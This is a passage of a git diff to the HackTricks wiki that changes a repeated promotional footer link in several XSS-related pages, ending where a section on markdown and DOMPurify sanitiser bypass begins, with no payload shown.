group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud). diff --git a/pentesting-web/xss-cross-site-scripting/chrome-cache-to-xss.md b/pentesting-web/xss-cross-site-scripting/chrome-cache-to-xss.md index 209eeb443..5bfd39d0d 100644 --- a/pentesting-web/xss-cross-site-scripting/chrome-cache-to-xss.md +++ b/pentesting-web/xss-cross-site-scripting/chrome-cache-to-xss.md @@ -7,7 +7,7 @@ * Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud). @@ -44,7 +44,7 @@ For further details on bfcache and disk cache, references can be found at [web.d * Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud). diff --git a/pentesting-web/xss-cross-site-scripting/dom-clobbering.md b/pentesting-web/xss-cross-site-scripting/dom-clobbering.md index ca102209f..f5a5cf65d 100644 --- a/pentesting-web/xss-cross-site-scripting/dom-clobbering.md +++ b/pentesting-web/xss-cross-site-scripting/dom-clobbering.md @@ -7,7 +7,7 @@ * Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud). @@ -244,7 +244,7 @@ Click to send! * Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud). diff --git a/pentesting-web/xss-cross-site-scripting/dom-xss.md b/pentesting-web/xss-cross-site-scripting/dom-xss.md index 6337bfe14..686b62988 100644 --- a/pentesting-web/xss-cross-site-scripting/dom-xss.md +++ b/pentesting-web/xss-cross-site-scripting/dom-xss.md @@ -7,7 +7,7 @@ * Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud). @@ -342,7 +342,7 @@ RegExp() * Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud). diff --git a/pentesting-web/xss-cross-site-scripting/iframes-in-xss-and-csp.md b/pentesting-web/xss-cross-site-scripting/iframes-in-xss-and-csp.md index 223ddb3bc..46e0d9647 100644 --- a/pentesting-web/xss-cross-site-scripting/iframes-in-xss-and-csp.md +++ b/pentesting-web/xss-cross-site-scripting/iframes-in-xss-and-csp.md @@ -7,7 +7,7 @@ * Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**. @@ -169,7 +169,7 @@ Check the following pages: * Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**. diff --git a/pentesting-web/xss-cross-site-scripting/other-js-tricks.md b/pentesting-web/xss-cross-site-scripting/other-js-tricks.md index 0d90abbcd..0199ffd6b 100644 --- a/pentesting-web/xss-cross-site-scripting/other-js-tricks.md +++ b/pentesting-web/xss-cross-site-scripting/other-js-tricks.md @@ -7,7 +7,7 @@ * Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud). @@ -513,7 +513,7 @@ async function sleep(ms) { * Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud). diff --git a/pentesting-web/xss-cross-site-scripting/some-same-origin-method-execution.md b/pentesting-web/xss-cross-site-scripting/some-same-origin-method-execution.md index 04956279e..1e41fdfe9 100644 --- a/pentesting-web/xss-cross-site-scripting/some-same-origin-method-execution.md +++ b/pentesting-web/xss-cross-site-scripting/some-same-origin-method-execution.md @@ -7,7 +7,7 @@ * Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud). @@ -57,7 +57,7 @@ Moreover, in order for the second page to be able to use the opener object **bot * Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud). diff --git a/pentesting-web/xss-cross-site-scripting/xss-in-markdown.md b/pentesting-web/xss-cross-site-scripting/xss-in-markdown.md index e9c286627..4c2710d22 100644 --- a/pentesting-web/xss-cross-site-scripting/xss-in-markdown.md +++ b/pentesting-web/xss-cross-site-scripting/xss-in-markdown.md @@ -7,7 +7,7 @@ * Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**. @@ -59,6 +59,7 @@ If HTML tags aren't an option you could always try to play with markdown syntax: The following code is **sanitising HTML input** and then **passing it to the markdown parser**, then, XSS can be triggered abusing miss-interpretations between Markdown and DOMPurify ```html +